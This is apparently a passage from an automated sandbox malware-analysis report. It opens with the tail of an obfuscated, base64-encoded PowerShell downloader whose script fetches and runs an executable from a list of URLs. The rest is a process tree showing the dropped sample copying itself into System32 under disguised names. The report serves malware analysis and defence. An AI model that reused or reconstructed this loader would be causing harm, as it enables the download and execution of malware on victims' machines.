ACwAIAAzADIALAAzADYAIAAsACAAMQAxADAALAAgADkANwAsADEAMAA5ACAALAAxADAAMQAsADMAMgAgACwAIAA0ADMALAAzADIAIAAsACAAMwA5ACAALAAgADQANgAgACwAMQAwADEAIAAsADEAMgAwACAALAAxADAAMQAsADMAOQAsACAANQA5ACwAMQAwADIAIAAsACAAMQAxADEAIAAsACAAMQAxADQALAAxADAAMQAgACwAOQA3ACwAOQA5ACAALAAxADAANAAgACwAIAA0ADAAIAAsADMANgAgACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAIAAzADIAIAAsADEAMAA1ACAALAAxADEAMAAgACwAIAAzADIALAAzADYALAAgADEAMQA3ACAALAAxADEANAAgACwAIAAxADAAOAAgACwAIAAxADEANQAsADQAMQAgACwAMQAyADMAIAAsADEAMQA2ACAALAAgADEAMQA0ACAALAAgADEAMgAxACAALAAgADEAMgAzACwAMwA2ACwAIAAxADEAOQAgACwAIAAxADAAMQAgACwAIAA5ADgAIAAsADkAOQAsADEAMAA4ACAALAAxADAANQAgACwAMQAwADEAIAAsACAAMQAxADAAIAAsADEAMQA2ACwANAA2ACwANgA4ACwAMQAxADEALAAxADEAOQAgACwAIAAxADEAMAAgACwAMQAwADgAIAAsADEAMQAxACAALAA5ADcAIAAsACAAMQAwADAALAA3ADAALAAgADEAMAA1ACAALAAxADAAOAAgACwAIAAxADAAMQAgACwAIAA0ADAALAAzADYALAAgADEAMQA3ACwAMQAxADQAIAAsACAAMQAwADgAIAAsACAANAA2ACwAIAA4ADQALAAgADEAMQAxACAALAA4ADMAIAAsACAAMQAxADYAIAAsACAAMQAxADQALAAxADAANQAsADEAMQAwACwAIAAxADAAMwAsADQAMAAgACwAIAA0ADEALAA0ADQAIAAsADMAMgAgACwAIAAzADYALAAxADEAMgAsACAAOQA3ACwAMQAxADYAIAAsADEAMAA0ACAALAA0ADEAIAAsACAANQA5ACAALAAgADgAMwAsADEAMQA2ACwAIAA5ADcALAAgADEAMQA0ACAALAAxADEANgAsACAANAA1ACwAIAA4ADAAIAAsACAAMQAxADQALAAgADEAMQAxACwAIAA5ADkAIAAsADEAMAAxACwAIAAxADEANQAgACwAIAAxADEANQAsACAAMwAyACAALAAgADMANgAgACwAMQAxADIAIAAsADkANwAgACwAIAAxADEANgAsACAAMQAwADQALAA1ADkALAA5ADgAIAAsADEAMQA0ACAALAAgADEAMAAxACAALAA5ADcALAAxADAANwAgACwAIAA1ADkAIAAsACAAMQAyADUAIAAsADkAOQAgACwAOQA3ACwAIAAxADEANgAsACAAOQA5ACwAMQAwADQALAAgADEAMgAzACAALAAgADEAMQA5ACwAIAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADYAIAAsADEAMAAxACwAIAA0ADUAIAAsADEAMAA0ACwAMQAxADEAIAAsACAAMQAxADUAIAAsACAAMQAxADYALAAzADIALAAgADMANgAgACwAOQA1ACwAIAA0ADYAIAAsACAANgA5ACAALAAxADIAMAAgACwAIAA5ADkALAAxADAAMQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsACAAMQAwADUALAAxADEAMQAgACwAMQAxADAAIAAsACAANAA2ACwAIAA3ADcAIAAsADEAMAAxACAALAAxADEANQAgACwAIAAxADEANQAgACwAOQA3ACwAMQAwADMALAAxADAAMQAgACwANQA5ACAALAAxADIANQAsACAAMQAyADUAIAApACAAfAAgACUAIAB7ACAAKAAgAFsAQwBIAEEAUgBdAFsASQBOAHQAXQAgACQAXwApAH0AIAApACAALQBKAE8ASQBuACcAJwApAA==
Imagebase:0x740e0000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:.Net C# or VB.NET

General

Start time:21:54:31
Start date:17/10/2017
Path:C:\Users\user~1\AppData\Local\Temp\16994.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Imagebase:0x772c0000
File size:98304 bytes
MD5 hash:50A739402E5E3BEA670F12D0DEC077CD
Programmed in:C, C++ or other language

General

Start time:21:54:36
Start date:17/10/2017
Path:C:\Users\user~1\AppData\Local\Temp\16994.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\16994.exe
Imagebase:0x76fc0000
File size:98304 bytes
MD5 hash:50A739402E5E3BEA670F12D0DEC077CD
Programmed in:C, C++ or other language

General

Start time:21:54:40
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\helphome.exe
Imagebase:0x772c0000
File size:98304 bytes
MD5 hash:50A739402E5E3BEA670F12D0DEC077CD
Programmed in:C, C++ or other language

General

Start time:21:54:40
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\helphome.exe
Imagebase:0x75440000
File size:98304 bytes
MD5 hash:50A739402E5E3BEA670F12D0DEC077CD
Programmed in:C, C++ or other language

General

Start time:21:54:47
Start date:17/10/2017
Path:C:\Windows\System32\LLocMy8gfC0E0xG3.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Imagebase:0x772c0000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:54:47
Start date:17/10/2017
Path:C:\Windows\System32\LLocMy8gfC0E0xG3.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Imagebase:0x772c0000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:54:50
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\helphome.exe
Imagebase:0x75440000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:54:50
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\helphome.exe
Imagebase:0x76260000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:55:03
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Imagebase:0x77390000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:55:03
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Imagebase:0x772c0000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:55:03
Start date:17/10/2017
Path:C:\Windows\System32\helphome.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Imagebase:0x772c0000
File size:98304 bytes
MD5 hash:D65519BCE4A9141B104D3D35444F2C25
Programmed in:C, C++ or other language

General

Start time:21:56:10
Start date:17/10/2017
Path:C:\Windows\System32\wbem\WmiApSrv.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\WmiApSrv.exe
Imagebase:0x77390000
File size:136192 bytes
MD5 hash:6EB6B66517B048D87DC1856DDF1F4C3F
Programmed in:C, C++ or other language

Disassembly

Code Analysis

Reset < >